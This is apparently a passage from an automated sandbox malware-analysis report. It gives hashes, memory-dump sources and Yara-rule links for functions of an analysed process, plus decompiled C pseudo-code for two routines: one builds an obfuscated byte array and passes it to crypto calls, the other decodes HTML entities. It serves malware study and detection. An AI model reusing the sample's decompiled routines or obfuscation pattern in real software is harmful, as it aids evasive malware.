Opcode Fuzzy Hash: be6b64918582586541e80f924acf2094315c68b09bb6013d9ec313929343685d
Instruction Fuzzy Hash: EDE0D87250030467D2509E06DC85B53FB98DB44A34F14C557EE0D2F302E172B5148AF5

Uniqueness

Uniqueness Score: -1.00%

Function 07C21F33, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616016517.0000000007C20000.00000040.00000001.sdmp, Offset: 07C20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3551458c52e4ecd35a1e3b54bc8452be63fd6d13f33fd9c913633ee21f929e9e
Instruction ID: 80c1d2decc5f80fa3b23768bc729d26a0a4fd78648d9b8d97c8834a9292bc10a
Opcode Fuzzy Hash: 3551458c52e4ecd35a1e3b54bc8452be63fd6d13f33fd9c913633ee21f929e9e
Instruction Fuzzy Hash: CEE0D8B255030067D2109E069C45B53FB98EB44A30F14C567EE082F302E171B5148AF5

Uniqueness

Uniqueness Score: -1.00%

Function 02C90748, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8545265ae3a9ec43a849c4662103227e78c95aad9c29798b53e0ec1ea1ed7d54
Instruction ID: 7d4cfd21edce5b542ca9e9917bbe4396030494fc5ff4564fb9831d0a34765041
Opcode Fuzzy Hash: 8545265ae3a9ec43a849c4662103227e78c95aad9c29798b53e0ec1ea1ed7d54
Instruction Fuzzy Hash: 6EF01574C02308EFCB24EFB4C0086AEBBB0FB45305F2049A9C81463344D73A9A50DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0102B0AF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.601758562.0000000001022000.00000040.00000001.sdmp, Offset: 01022000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f73fbd8f242d2e88bd44616b8d42690d059acf97bcbf76569dc5eaad8300b3d
Instruction ID: 03cc5d014f05273599194029625d3c775c6032dfabf1adf8577891f4f841ff10
Opcode Fuzzy Hash: 0f73fbd8f242d2e88bd44616b8d42690d059acf97bcbf76569dc5eaad8300b3d
Instruction Fuzzy Hash: 3CE0D872A5020467D2109F069C41B53FB58DB44A30F14C557EE0D2F302E171B5148AF5

Uniqueness

Uniqueness Score: -1.00%

Function 02C90280, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e924e1249b60b675b7ada7bec54980d444508f4fba52b1ab26c06ba00c4619c0
Instruction ID: 239b3152a5f8b1b40e897cb2b446de6846661b0948d361ea6f5518e3a63db801
Opcode Fuzzy Hash: e924e1249b60b675b7ada7bec54980d444508f4fba52b1ab26c06ba00c4619c0
Instruction Fuzzy Hash: 11E04F34905709DBCF28DFA5D6446ADB7B5EF45301F2040B9D84453340DB3A5E50DB81

Uniqueness

Uniqueness Score: -1.00%

Function 02C9013E, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dd83cc101e9f142cf4ab8a0d89fa77b56a8d0352504f4e531bf331712257696
Instruction ID: a2f747d4db46bc046ebee3c08fe68d50c1012d6011c71da769418bcb24acb129
Opcode Fuzzy Hash: 6dd83cc101e9f142cf4ab8a0d89fa77b56a8d0352504f4e531bf331712257696
Instruction Fuzzy Hash: 34D01735D04208CBCB109FA4E4842ECF770EB8A325F209426C218B3200C3318545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02C9011D, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8ef396268e8dea9a0306f738c8cfbe287628ac0f48ff325654e20b03264ec83
Instruction ID: 1f43fd2c9f9822e49a553f4e0579e12e5dd550347f26683f88071cc8e495754f
Opcode Fuzzy Hash: e8ef396268e8dea9a0306f738c8cfbe287628ac0f48ff325654e20b03264ec83
Instruction Fuzzy Hash: 9FD0C936E05208CF8B109FA8E4404DCF771EB8A235F219066D618B3300C7329455CF64

Uniqueness

Uniqueness Score: -1.00%

Function 010123F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.601406259.0000000001012000.00000040.00000001.sdmp, Offset: 01012000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bac0cee8b7073e316e3ca6d6c7b8aa80aa4d9840fcac00b0b87f715b4b54776c
Instruction ID: 0552439db7ae439b9b08b5d70001937a819cb933f9999e24b8278ddc0c5c33b8
Opcode Fuzzy Hash: bac0cee8b7073e316e3ca6d6c7b8aa80aa4d9840fcac00b0b87f715b4b54776c
Instruction Fuzzy Hash: 17D05E79255A818FE3268A1CC1A8B953FE4AB51B04F5644FDE8408B667C768E9D1D200

Uniqueness

Uniqueness Score: -1.00%

Function 010123BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.601406259.0000000001012000.00000040.00000001.sdmp, Offset: 01012000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e0f4ed4f44d71b0a769fa8f406923526fc75a43232e33ccd942d024ccf1b3cd
Instruction ID: 76a63cf0fac7a452d71f26d3c8af15fcc0ff0290ace26e86f6037042f0d36d23
Opcode Fuzzy Hash: 1e0f4ed4f44d71b0a769fa8f406923526fc75a43232e33ccd942d024ccf1b3cd
Instruction Fuzzy Hash: E8D05E342002818FD715DB0CC594F593BD4AB41B00F1684E8AD408B666C3A8D881D600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008AB1E6, Relevance: 60.3, Strings: 48, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E008AB1E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				char _v12;
				signed char* _v16;
				signed char* _v20;
				signed char* _v24;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				signed char* _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				signed char* _v284;
				char _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				signed int _v300;
				char _v320;
				void _v348;
				void* __ebx;
				void* __edi;
				void* _t178;
				void* _t180;
				void* _t182;
				signed char* _t184;
				intOrPtr _t219;
				signed int _t231;
				intOrPtr _t242;

				_t242 = __ecx;
				_push(0x44356c);
				_v292 = __ecx;
				_a4 = _a4 + 4;
				_t178 = E008B105D(_a4 + 4);
				_push(_t178);
				L008EB581();
				_t219 = _a8;
				if(_t178 == 0) {
					E008B1069(E008B105D(_t219 + 4) | 0xffffffff, __ecx + 0x2c, _t216);
				}
				_push(0x44357c);
				_t180 = E008B105D(_a4);
				_push(_t180);
				L008EB581();
				if(_t180 == 0) {
					E008B1069(E008B105D(_t219 + 4) | 0xffffffff, _t242 + 0x40, _t212);
				}
				_push(0x443588);
				_t182 = E008B105D(_a4);
				_push(_t182);
				L008EB581();
				if(_t182 == 0) {
					E008B1069(E008B105D(_t219 + 4) | 0xffffffff, _t242 + 0x54, _t208);
				}
				_push(0x443598);
				_t184 = E008B105D(_a4);
				_push(_t184);
				L008EB581();
				if(_t184 != 0) {
					L13:
					return _t184;
				} else {
					_v24 = _t184;
					_v16 = _t184;
					_v20 = _t184;
					_v280 = 0x1d;
					_v279 = 0xac;
					_v278 = 0xa8;
					_v277 = 0xf8;
					_v276 = 0xd3;
					_v275 = 0xb8;
					_v274 = 0x48;
					_v273 = 0x3e;
					_v272 = 0x48;
					_v271 = 0x7d;
					_v270 = 0x3e;
					_v269 = 0xa;
					_v268 = 0x62;
					_v267 = 7;
					_v266 = 0xdd;
					_v265 = 0x26;
					_v264 = 0xe6;
					_v263 = 0x67;
					_v262 = 0x81;
					_v261 = 3;
					_v260 = 0xe7;
					_v259 = 0xb2;
					_v258 = 0x13;
					_v257 = 0xa5;
					_v256 = 0xb0;
					_v255 = 0x79;
					_v254 = 0xee;
					_v253 = 0x4f;
					_v252 = 0xf;
					_v251 = 0x41;
					_v250 = 0x15;
					_v249 = 0xed;
					_v248 = 0x7b;
					_v247 = 0x14;
					_v246 = 0x8c;
					_v245 = 0xe5;
					_v244 = 0x4b;
					_v243 = 0x46;
					_v242 = 0xd;
					_v241 = 0xc1;
					_v240 = 0x8e;
					_v239 = 0xfe;
					_v238 = 0xd6;
					_v237 = 0xe7;
					_v236 = 0x27;
					_v235 = 0x75;
					_v234 = 6;
					_v233 = 0x8b;
					_v232 = 0x49;
					_v231 = _t184;
					_v230 = 0xdc;
					_v229 = 0xf;
					_v228 = 0x30;
					_v227 = 0xa0;
					_v226 = 0x9e;
					_v225 = 0xfd;
					_v224 = 9;
					_v223 = 0x85;
					_v222 = 0xf1;
					_v221 = 0xc8;
					_v220 = 0xaa;
					_v219 = 0x75;
					_v218 = 0xc1;
					_v217 = 8;
					_v216 = 5;
					_v215 = 0x79;
					_v214 = 1;
					_v213 = 0xe2;
					_v212 = 0x97;
					_v211 = 0xd8;
					_v210 = 0xaf;
					_v209 = 0x80;
					_v208 = 0x38;
					_v207 = 0x60;
					_v206 = 0xb;
					_v205 = 0x71;
					_v204 = 0xe;
					_v203 = 0x68;
					_push(0x80);
					_push(_t184);
					_push( &_v152);
					_v202 = 0x53;
					_v201 = 0x77;
					_v200 = 0x2f;
					_v199 = 0xf;
					_v198 = 0x61;
					_v197 = 0xf6;
					_v196 = 0x1d;
					_v195 = 0x8e;
					_v194 = 0x8f;
					_v193 = 0x5c;
					_v192 = 0xb2;
					_v191 = 0x3d;
					_v190 = 0x21;
					_v189 = 0x74;
					_v188 = 0x40;
					_v187 = 0x4b;
					_v186 = 0xb5;
					_v185 = 6;
					_v184 = 0x6e;
					_v183 = 0xab;
					_v182 = 0x7a;
					_v181 = 0xbd;
					_v180 = 0x8b;
					_v179 = 0xa9;
					_v178 = 0x7e;
					_v177 = 0x32;
					_v176 = 0x8f;
					_v175 = 0x6e;
					_v174 = 6;
					_v173 = 0x24;
					_v172 = 0xd9;
					_v171 = 0x29;
					_v170 = 0xa4;
					_v169 = 0xa5;
					_v168 = 0xbe;
					_v167 = 0x26;
					_v166 = 0x23;
					_v165 = 0xfd;
					_v164 = 0xee;
					_v163 = 0xf1;
					_v162 = 0x4c;
					_v161 = 0xf;
					_v160 = 0x74;
					_v159 = 0x5e;
					_v158 = 0x58;
					_v157 = 0xfb;
					_v156 = 0x91;
					_v155 = 0x74;
					_v154 = 0xef;
					_v153 = 0x91;
					L008EB531();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t231 = 7;
					_push(0x11);
					asm("movsb");
					_push( &_v320);
					_push( &_v152);
					memcpy( &_v348, 0x4435b8, _t231 << 2);
					L008EB575();
					_v8 =  &_v280;
					_v296 =  *((intOrPtr*)(_t219 + 0x18));
					_v12 = 0x90;
					_v300 =  *(_t219 + 2) & 0x0000ffff;
					if(E008AC860( &_v24,  &_v300,  &_v12, 0,  &_v288) != 0) {
						L9:
						_t184 = _v284;
						if(_t184 != 0) {
							E008B118A(_v292 + 0x68,  &(_t184[4]),  *_t184 & 0x000000ff, 0);
							_t184 =  *0x4430d8(_v284);
						}
						L11:
						if(_v24 == 0) {
							goto L13;
						}
						return  *0x443100(_v24);
					}
					_push(0x1c);
					_push( &_v348);
					_push( &_v152);
					L008EB575();
					_v8 =  &_v280;
					_v12 = 0x9b;
					_t184 = E008AC860( &_v24,  &_v300,  &_v12, 0,  &_v288);
					if(_t184 == 0) {
						goto L11;
					}
					goto L9;
				}
			}

0x008ab1f8
0x008ab1fa
0x008ab1ff
0x008ab205
0x008ab208
0x008ab20d
0x008ab20e
0x008ab215
0x008ab21a
0x008ab22b
0x008ab22b
0x008ab233
0x008ab238
0x008ab23d
0x008ab23e
0x008ab247
0x008ab258
0x008ab258
0x008ab260
0x008ab265
0x008ab26a
0x008ab26b
0x008ab274
0x008ab285
0x008ab285
0x008ab28d
0x008ab292
0x008ab297
0x008ab298
0x008ab2a1
0x008ab744
0x008ab744
0x008ab2a7
0x008ab2a7
0x008ab2aa
0x008ab2ad
0x008ab2b0
0x008ab2b7
0x008ab2be
0x008ab2c5
0x008ab2cc
0x008ab2d3
0x008ab2da
0x008ab2e1
0x008ab2e8
0x008ab2ef
0x008ab2f6
0x008ab2fd
0x008ab304
0x008ab30b
0x008ab312
0x008ab319
0x008ab320
0x008ab327
0x008ab32e
0x008ab335
0x008ab33c
0x008ab343
0x008ab34a
0x008ab351
0x008ab358
0x008ab35f
0x008ab366
0x008ab36d
0x008ab374
0x008ab37b
0x008ab382
0x008ab389
0x008ab390
0x008ab397
0x008ab39e
0x008ab3a5
0x008ab3ac
0x008ab3b3
0x008ab3ba
0x008ab3c1
0x008ab3c8
0x008ab3cf
0x008ab3d6
0x008ab3dd
0x008ab3e4
0x008ab3eb
0x008ab3f2
0x008ab3f9
0x008ab400
0x008ab407
0x008ab40d
0x008ab414
0x008ab41b
0x008ab422
0x008ab429
0x008ab430
0x008ab437
0x008ab43e
0x008ab445
0x008ab44c
0x008ab453
0x008ab45a
0x008ab461
0x008ab468
0x008ab46f
0x008ab476
0x008ab47d
0x008ab484
0x008ab48b
0x008ab492
0x008ab499
0x008ab4a0
0x008ab4a7
0x008ab4ae
0x008ab4b5
0x008ab4bc
0x008ab4c3
0x008ab4ca
0x008ab4d1
0x008ab4d6
0x008ab4dd
0x008ab4de
0x008ab4e5
0x008ab4ec
0x008ab4f3
0x008ab4fa
0x008ab501
0x008ab508
0x008ab50f
0x008ab516
0x008ab51d
0x008ab524
0x008ab52b
0x008ab532
0x008ab539
0x008ab540
0x008ab547
0x008ab54e
0x008ab555
0x008ab55c
0x008ab563
0x008ab56a
0x008ab571
0x008ab578
0x008ab57f
0x008ab586
0x008ab58d
0x008ab594
0x008ab59b
0x008ab5a2
0x008ab5a9
0x008ab5b0
0x008ab5b7
0x008ab5be
0x008ab5c5
0x008ab5cc
0x008ab5d3
0x008ab5da
0x008ab5e1
0x008ab5e8
0x008ab5ef
0x008ab5f6
0x008ab5fd
0x008ab604
0x008ab60b
0x008ab612
0x008ab619
0x008ab620
0x008ab627
0x008ab62e
0x008ab635
0x008ab63c
0x008ab64c
0x008ab64d
0x008ab64e
0x008ab651
0x008ab652
0x008ab653
0x008ab65b
0x008ab65c
0x008ab66e
0x008ab66f
0x008ab671
0x008ab67c
0x008ab682
0x008ab68f
0x008ab696
0x008ab6bb
0x008ab704
0x008ab704
0x008ab70c
0x008ab720
0x008ab72b
0x008ab72b
0x008ab731
0x008ab735
0x00000000
0x00000000
0x00000000
0x008ab73a
0x008ab6bd
0x008ab6c5
0x008ab6cc
0x008ab6cd
0x008ab6db
0x008ab6f4
0x008ab6fb
0x008ab702
0x00000000
0x00000000
0x00000000
0x008ab702

Strings

=, xrefs: 008AB52B
!, xrefs: 008AB532
{, xrefs: 008AB390
}, xrefs: 008AB2EF
2, xrefs: 008AB58D
h, xrefs: 008AB4CA
A, xrefs: 008AB37B
u, xrefs: 008AB3EB
y, xrefs: 008AB476
#, xrefs: 008AB5DA
@, xrefs: 008AB540
X, xrefs: 008AB612
H, xrefs: 008AB2DA
I, xrefs: 008AB400
`, xrefs: 008AB4AE
/, xrefs: 008AB4EC
&, xrefs: 008AB319
t, xrefs: 008AB627
>, xrefs: 008AB2F6
g, xrefs: 008AB327
~, xrefs: 008AB586
K, xrefs: 008AB3AC
L, xrefs: 008AB5F6
', xrefs: 008AB3E4
^, xrefs: 008AB60B
0, xrefs: 008AB41B
O, xrefs: 008AB36D
$, xrefs: 008AB5A9
q, xrefs: 008AB4BC
\, xrefs: 008AB51D
t, xrefs: 008AB604
u, xrefs: 008AB45A
a, xrefs: 008AB4FA
>, xrefs: 008AB2E1
), xrefs: 008AB5B7
n, xrefs: 008AB55C
K, xrefs: 008AB547
F, xrefs: 008AB3B3
H, xrefs: 008AB2E8
t, xrefs: 008AB539
S, xrefs: 008AB4DE
y, xrefs: 008AB35F
z, xrefs: 008AB56A
8, xrefs: 008AB4A7
n, xrefs: 008AB59B
&, xrefs: 008AB5D3
b, xrefs: 008AB304
w, xrefs: 008AB4E5

Memory Dump Source

Source File: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000D.00000002.599319686.00000000008A0000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.599927792.0000000000922000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
API String ID: 0-140969752
Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
Instruction ID: 2a2273fd139389c88367c530b432fdfdc47c5e0f357831379b60df05e8f39858
Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
Instruction Fuzzy Hash: AFF1FD209087E9C9DB32C6788C497CEBE645B23324F0843D9D1E87A2D2D7B55BC58B66

Uniqueness

Uniqueness Score: -1.00%

Function 0090E67A, Relevance: 57.8, Strings: 46, Instructions: 307
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0090E67A(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v76;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr* _t200;
				char* _t202;
				signed int _t203;
				intOrPtr _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				char _t215;
				intOrPtr _t216;
				short _t219;
				signed int _t224;
				intOrPtr* _t225;
				intOrPtr _t230;
				intOrPtr* _t231;
				intOrPtr* _t233;
				intOrPtr* _t238;
				signed int _t239;
				signed int _t242;
				intOrPtr _t243;
				intOrPtr* _t244;
				signed int _t245;
				void* _t247;
				void* _t248;
				void* _t249;

				_v64 = 0x413f68;
				_v60 = 0x413f70;
				_v56 = 0x413f74;
				_v52 = 0x413f78;
				_v48 = 0x413f80;
				_v44 = 0x413f88;
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = 0x413f90;
				_v464 = 0x413f98;
				_v460 = 0x413fa0;
				_v456 = 0x413fa8;
				_v452 = 0x413fb0;
				_v448 = 0x413fb8;
				_v444 = 0x413fc0;
				_v440 = 0x413fc8;
				_v436 = 0x413fd0;
				_v432 = 0x413fd8;
				_v428 = 0x413fe0;
				_v424 = 0x413fe8;
				_v420 = 0x413ff0;
				_v416 = 0x413ff8;
				_v412 = 0x414000;
				_v408 = 0x414008;
				_v404 = 0x414010;
				_v400 = 0x414018;
				_v396 = 0x414020;
				_v392 = 0x414028;
				_v388 = 0x414030;
				_v384 = 0x414038;
				_v380 = 0x414040;
				_v376 = 0x414048;
				_v372 = 0x414050;
				_v368 = 0x414058;
				_v364 = 0x414060;
				_v360 = 0x414068;
				_v356 = 0x414070;
				_v352 = 0x414078;
				_v348 = 0x414080;
				_v344 = 0x414088;
				_v340 = 0x414090;
				_v336 = 0x414098;
				_v332 = 0x4140a0;
				_v328 = 0x4140a8;
				_v324 = 0x4140b0;
				_v320 = 0x4140b8;
				_v316 = 0x4140c0;
				_v312 = 0x4140c8;
				_v308 = 0x4140d0;
				_v304 = 0x4140d8;
				_v300 = 0x4140e0;
				_v296 = 0x4140e8;
				_v292 = 0x4140f0;
				_v288 = 0x4140f8;
				_v284 = 0x414100;
				_v280 = 0x414108;
				_v276 = 0x414110;
				_v272 = 0x414118;
				_v268 = 0x414120;
				_v264 = 0x414128;
				_v260 = 0x414130;
				_v256 = 0x414138;
				_v252 = 0x414140;
				_v248 = 0x414148;
				_v244 = 0x414150;
				_v240 = 0x414158;
				_v236 = 0x414160;
				_v232 = 0x414168;
				_v228 = 0x414170;
				_v224 = 0x414178;
				_v220 = 0x414180;
				_v216 = 0x414188;
				_v212 = 0x414190;
				_v208 = 0x414198;
				_v204 = 0x4141a0;
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t224 = 0;
				_t247 = 0;
				_v200 = 0x4141a8;
				_v196 = 0x4141b0;
				_v192 = 0x4141b8;
				_v188 = 0x4141c0;
				_v184 = 0x4141c8;
				_v180 = 0x4141d0;
				_v176 = 0x4141d8;
				_v172 = 0x4141e0;
				_v168 = 0x4141e8;
				_v164 = 0x4141f0;
				_v160 = 0x4141f8;
				_v156 = 0x414200;
				_v152 = 0x414208;
				_v148 = 0x414210;
				_v144 = 0x414218;
				_v140 = 0x414220;
				_v136 = 0x414228;
				_v132 = 0x414230;
				_v128 = 0x414238;
				_v124 = 0x414240;
				_v120 = 0x414248;
				_v116 = 0x414250;
				_v112 = 0x414258;
				_v108 = 0x414260;
				_v104 = 0x414268;
				_v100 = 0x414270;
				_v96 = 0x414278;
				_v92 = 0x414280;
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t224;
					 *_t202 = 0;
					if(_a20 == 0 || _t224 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t247) {
					_t225 = _t247 + _t200;
					_t203 =  *_t225;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t224 + _a4)) = _t203;
							_t224 = _t224 + 1;
						} else {
							if(_t224 != _v28) {
								 *((char*)(_t224 + _a4)) = 0x20;
								_t224 = _t224 + 1;
								if(_a20 != 0 && _t224 == 1) {
									_t224 = 0;
								}
							}
							_v28 = _t224;
						}
						_t247 = _t247 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t247 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t242 = 0;
					_v36 = _t225 + 1;
					while(1) {
						_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
						L009103B6();
						_push(_t203);
						_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
						_v8 = _t203;
						_push(_v36);
						L009104AE();
						_t249 = _t249 + 0x10;
						if(_t203 == 0) {
							break;
						}
						_t242 = _t242 + 1;
						if(_t242 < 6) {
							continue;
						}
						_t207 = _a8;
						if( *((char*)(_t247 + _t207 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t209 =  *((intOrPtr*)(_t248 + _v8 * 4 - 0x1d0));
								_push(_t209);
								_v40 = _t209;
								L009103B6();
								_t243 = _t209;
								_push(_t243);
								_push(_v40);
								_push(_v36);
								L009104AE();
								_t249 = _t249 + 0x10;
								if(_t209 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t224 + _a4)) = _v8 - 0x5f;
							_t224 = _t224 + 1;
							_t247 = _t247 + _t243 + 1;
							goto L43;
						}
						_t128 = _t207 + 2; // 0x2
						_t244 = _t247 + _t128;
						_t230 =  *_t244;
						if(_t230 == 0x78 || _t230 == 0x58) {
							_t159 = _t207 + 3; // 0x3
							_t238 = _t247 + _t159;
							_t231 = _t238;
							_t245 = 0;
							while(1) {
								_t212 =  *_t231;
								if(_t212 == 0) {
									break;
								}
								if(_t212 == 0x3b) {
									L27:
									if(_t245 <= 0) {
										goto L29;
									}
									_push(_t245);
									_push(_t238);
									_push( &_v88);
									L0091043C();
									 *((char*)(_t248 + _t245 - 0x54)) = 0;
									_t215 = E00905384( &_v88,  &_v88);
									_t249 = _t249 + 0x10;
									 *((char*)(_t224 + _a4)) = _t215;
									_t224 = _t224 + 1;
									_t247 = _t247 + _t245 + 4;
									goto L43;
								}
								_t245 = _t245 + 1;
								if(_t245 >= 4) {
									break;
								}
								_t231 = _t231 + 1;
							}
							_t245 = _t245 | 0xffffffff;
							goto L27;
						} else {
							_t233 = _t244;
							_t239 = 0;
							while(1) {
								_t216 =  *_t233;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									_v8 = _t239;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									L0091043C();
									 *((char*)(_t248 + _v8 - 0x48)) = 0;
									_t219 =  &_v76;
									L00910430();
									_t249 = _t249 + 0x10;
									_v32 = _t219;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									 *0x4120d4(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0, _t219,  &_v76, _t244, _v8);
									 *((char*)(_t224 + _a4)) = _v12;
									_t224 = _t224 + 1;
									_t247 = _t247 + _v8 + 3;
									goto L43;
								}
								_t239 = _t239 + 1;
								if(_t239 >= 6) {
									break;
								}
								_t233 = _t233 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t224 + _a4)) =  *((intOrPtr*)(_t248 + _t242 - 0x14));
